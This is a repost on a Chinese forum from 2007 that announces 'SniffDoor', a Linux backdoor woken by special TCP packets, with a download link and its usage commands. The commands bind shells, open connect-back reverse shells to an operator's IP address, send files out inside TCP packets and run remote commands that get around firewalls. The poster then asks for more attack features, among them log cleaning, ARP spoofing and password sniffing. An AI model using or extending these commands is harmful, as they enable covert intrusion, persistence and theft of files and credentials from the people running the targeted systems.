[转载]SniffDoor V 0.7a (开源代码)

perlish

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 44
精华: 6
积分: 301
阅读权限: 100
性别: 男
在线时间: 24 小时
注册时间: 2005-8-15
最后登录: 2007-11-21

发短消息
加为好友
当前离线

楼主大中小发表于 2007-5-31 21:00 只看该作者

[转载]SniffDoor V 0.7a (开源代码)

文章作者：wzt
原始出处：xsec.org

SniffDoor V 0.7a (c) 2007  by wzt  <wzt@xsec.org>
+--------------------------------------------------+

Sniffdoor is a linux backdoor woke up with a special
tcp packet.It can bind a shell with tty,it can send
files with tcp packet,that's means the server side
can sniff your files in the special tcp packets,
and save on its server.The client can send a shell
command with the packet,the server sniff and execute
it,so it can round the firewall.

+--------------------------------------------------+
[USAGE]:

server:

type make;
./sniffdoor

client:
type make;

sniffdoor <options> [remote_ip] [port] [command]

<options>:
-packet <remote_ip> [port] <command>
-connect <remote ip> <port>
-listen <port>

<command>:
bind:<port>
back:<remote_ip> <port>
file:<filename>
comm:<command>

1. bindshell:
  send tcp packet to host 61.155.217.56,and then it
  bind a shell on port 999
  ./client -packet 61.155.217.56 bind:999
  ./client -packet 61.155.217.56 22 bind:999
  port 22 is a active port on the host.

2.connect back door:
  1).you server must listen a port first(your ip
is 123.45.64.57):
  ./client -listen 999

  2).send tcp packet to host 61.155.217.56,and then
  bind a shell to remote 123.45.64.57 on port 999
  ./client -packet 61.155.217.56 back:123.45.64.57:999
  ./client -packet 61.155.217.56 21 back:123.45.64.57:999

3.send file:
  1).send file with tcp packet.
  ./client -packet 61.155.217.56 file:bind.c
  ./client -packet 61.155.217.56 80 file:bind.c

  NOTE!
  It can only send txt files , not binary files.
  If you fixed up this bug,mail to me,thx.

4.execute command:
  1).execute command with tcp packet.
  ./client -packet 61.155.217.56 comm:"gcc -o bind bind.c"
  ./client -packet 61.155.217.56 23 comm:"gcc -o bind bind.c"

+-----------------------------------------------------+

[THANKS]:

Thank baozi for testing the door all the time.

[END]:

send any bug to <wzt@xsec.org>.

download: http://wzt.wzt.googlepages.com/sniffdoor.tar

打算做成一个allinone的东西，大家多提建议，看看作为一个linux下的后么+渗透程序还需要什么功能（当然，攻击目标完全可以是windows）。
我的req
1：ttysniffer弄进来 -->难度十分之大。
2：把windows下的htran移植进来，包括socks5(带用户密码) -->有点难度，比如client 发送 ip pack -proxy -bind eth0 port user pass -->正在进行时！
3：logcleaner -->easy job
4：portscanner with banner grabber -->the same
5：nbtenum for windows -->easy job
6：arp欺骗+网络sniffer弄进来，可以抓一些明文的密码，如果可以抓smb就超级强了 -->难度一般
7：mssql scan + mssql client --> easy job